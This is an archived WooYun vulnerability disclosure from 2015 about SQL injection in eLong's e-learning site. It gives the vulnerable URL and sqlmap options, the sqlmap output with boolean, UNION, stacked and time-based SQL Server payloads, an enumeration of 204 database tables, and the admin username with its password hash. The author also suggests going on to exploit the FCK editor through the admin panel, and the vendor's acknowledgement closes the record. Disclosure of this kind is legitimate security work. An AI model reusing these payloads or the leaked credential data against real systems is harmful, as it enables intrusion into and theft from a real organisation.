乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-24: 细节已通知厂商并且等待厂商处理中 2015-03-25: 厂商已经确认,细节仅向厂商公开 2015-04-04: 细节向核心白帽子及相关领域专家公开 2015-04-14: 细节向普通白帽子公开 2015-04-24: 细节向实习白帽子公开 2015-05-09: 细节向公众公开
飞
注入点http://elearning.corp.elong.com/Showknowledge.aspx?id=214必须10S以上延迟不然报错
-dbs --time-sec 10
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=212 AND 8115=8115 Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: id=-3129 UNION ALL SELECT NULL, NULL, CHAR(58)+CHAR(113)+CHAR(112)+CHAR(121)+CHAR(58)+CHAR(66)+CHAR(103)+CHAR(111)+CHAR(83)+CHAR(119)+CHAR(113)+CHAR(85)+CHAR(113)+CHAR(109)+CHAR(102)+CHAR(58)+CHAR(114)+CHAR(104)+CHAR(114)+CHAR(58), NULL, NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=212; WAITFOR DELAY '0:0:10';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=212 WAITFOR DELAY '0:0:10'-----Database: elonglearning[204 tables]+----------------------------+| dbo.Ability || dbo.Appliance || dbo.Appraise || dbo.BorrowReturnRecord || dbo.Business || dbo.BusinessRole || dbo.CStation || dbo.CUsers || dbo.Card || dbo.CardClass || dbo.CardFee || dbo.CasesClass || dbo.Cbusiness || dbo.CertificateRecord || dbo.ChatContent || dbo.ChooseType || dbo.Class || dbo.CouncilUser || dbo.CourseAchieve || dbo.CourseAchieveUser || dbo.CourseAchieveUser1 || dbo.CourseClass || dbo.CourseClassUser || dbo.CourseClassZu || dbo.CourseDataInfo || dbo.CourseExam || dbo.CourseExamUser || dbo.CourseJR || dbo.CourseRes || dbo.CourseResIng || dbo.CourseResUser || dbo.CourseSort || dbo.CourseSortGovernor || dbo.CourseState || dbo.CourseStructure || dbo.CourseSu || dbo.CourseTeacherNum || dbo.CourseUser || dbo.CourseUserSel || dbo.CourseValue || dbo.CourseView || dbo.CourseWare || dbo.Courses || dbo.CousePlan || dbo.Demand || dbo.DemandCourse || dbo.DemandCourseDept || dbo.DemandCourseDeptMain || dbo.DemandCourseMain || dbo.DemandCourseUser || dbo.DemandDept || dbo.DemandDeptMain || dbo.DemandMain || dbo.DemandMains || dbo.DeptPlan || dbo.DeptUser || dbo.DeptUserCourseData || dbo.DeptUsers || dbo.Directory || dbo.Episteme || dbo.EpistemeClass || dbo.ExamAuthority || dbo.ExamCourse || dbo.ExamCourse1 || dbo.ExamCourseUserWWC || dbo.ExamDataInfo || dbo.ExamKC || dbo.ExamMain || dbo.ExamPaper || dbo.ExamSu || dbo.ExamUser || dbo.ExamUserMain || dbo.ExamUsers || dbo.ExecuteCourse || dbo.Expense || dbo.Feedback || dbo.Goods || dbo.Governor || dbo.Ground || dbo.GroupCourseExamUser || dbo.Groups || dbo.Info || dbo.JGType || dbo.JoinResearch || dbo.KC || dbo.KD || dbo.LearningTime || dbo.LoginField || dbo.Manager || dbo.ManagesUser || dbo.Message || dbo.Messages || dbo.MessagesUser || dbo.NetWorkCourseSort || dbo.NetWorkCourseSort1 || dbo.NewCourseData || dbo.NewDeptTrainData || dbo.NewExamData || dbo.NewExamTestData || dbo.News || dbo.NewsType || dbo.OffLineExam || dbo.OffLineExam2 || dbo.OffLineExam3 || dbo.OffLineExamUser || dbo.OfflineCourses || dbo.OutTrain || dbo.PGtype || dbo.PXTeacher || dbo.PXZUsers || dbo.PersonPlan || dbo.PlanCourse || dbo.PlanCourses || dbo.ProFunds || dbo.Progress || dbo.Pxhy || dbo.Pxjg || dbo.RY || dbo.Record || dbo.Research || dbo.ResearchKey || dbo.ResearchSubject || dbo.ReturnDetail || dbo.RlShowTeacherPlan || dbo.Roles || dbo.RolesRules || dbo.SHView || dbo.SelCourseExamUser || dbo.Station || dbo.StationAbility || dbo.StationApprove || dbo.StationApproveUser || dbo.StationApproveZu || dbo.StationCourseClass || dbo.StationCourseClassUser || dbo.StationCourseUser || dbo.StrCourse || dbo.Structure || dbo.StudyTotalNum || dbo.Stuff || dbo.StuffClass || dbo.SubjectDetail || dbo.SubjectDetails || dbo.SubjectTactic || dbo.SubjectType || dbo.SysRules || dbo.TeachRecord || dbo.TeacherCourseNum || dbo.TeacherPlan || dbo.TeacherType || dbo.Teachers || dbo.Templet || dbo.TextBooks || dbo.Titles || dbo.Tklx || dbo.TotalNum || dbo.TrainClass || dbo.TrainData || dbo.TrainExpense || dbo.TrainPersons || dbo.TrainPlan || dbo.TrainTime || dbo.TrainType || dbo.UserCourse || dbo.UserExam || dbo.UserGoods || dbo.UserGroup || dbo.UserInfo || dbo.UserMessage || dbo.UserPoint || dbo.UserStructureTable || dbo.UserStructures || dbo.UserTables || dbo.UserTactic || dbo.UserToExam || dbo.UserZS || dbo.Users || dbo.Uusers || dbo.WareType || dbo.XXCoursePlan || dbo.XXPersonData || dbo.XXPlanPersonNum || dbo.Years || dbo.ZCType || dbo.cases || dbo.casesing || dbo.dtproperties || dbo.exammainpaper || dbo.jhfw || dbo.jhmb || dbo.jhsq || dbo.rz || dbo.sysdiagrams || dbo.sysfilei || dbo.tables || dbo.totoalstudynum || dbo.upload || dbo.vadmin || dbo.vadminlog || dbo.vkilluser || dbo.vpsconf || dbo.vroominfo || dbo.vroomtype || dbo.vuserinfo |+----------------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=212 AND 8115=8115 Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: id=-3129 UNION ALL SELECT NULL, NULL, CHAR(58)+CHAR(113)+CHAR(112)+CHAR(121)+CHAR(58)+CHAR(66)+CHAR(103)+CHAR(111)+CHAR(83)+CHAR(119)+CHAR(113)+CHAR(85)+CHAR(113)+CHAR(109)+CHAR(102)+CHAR(58)+CHAR(114)+CHAR(104)+CHAR(114)+CHAR(58), NULL, NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: id=212; WAITFOR DELAY '0:0:10';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: id=212 WAITFOR DELAY '0:0:10'-----Database: elonglearningTable: dbo.vadmin[1 entry]+---------+-----------+----------------------------------+| adminid | psysadmin | adminpass |+---------+-----------+----------------------------------+| admin | <blank> | 0146636BB87967E6A4DC4B80BE9E610F |+---------+-----------+----------------------------------+
+---------+-----------+----------------------------------+| adminid | psysadmin | adminpass |+---------+-----------+----------------------------------+| admin | <blank> | 0146636BB87967E6A4DC4B80BE9E610F |+---------+-----------+----------------------------------+虽然爆了密码但是怎么试都不对如果登入后台 FCK还是很好搞的
修复sql注入
危害等级:中
漏洞Rank:10
确认时间:2015-03-25 11:03
感谢白帽子提醒,我们会尽快修复
暂无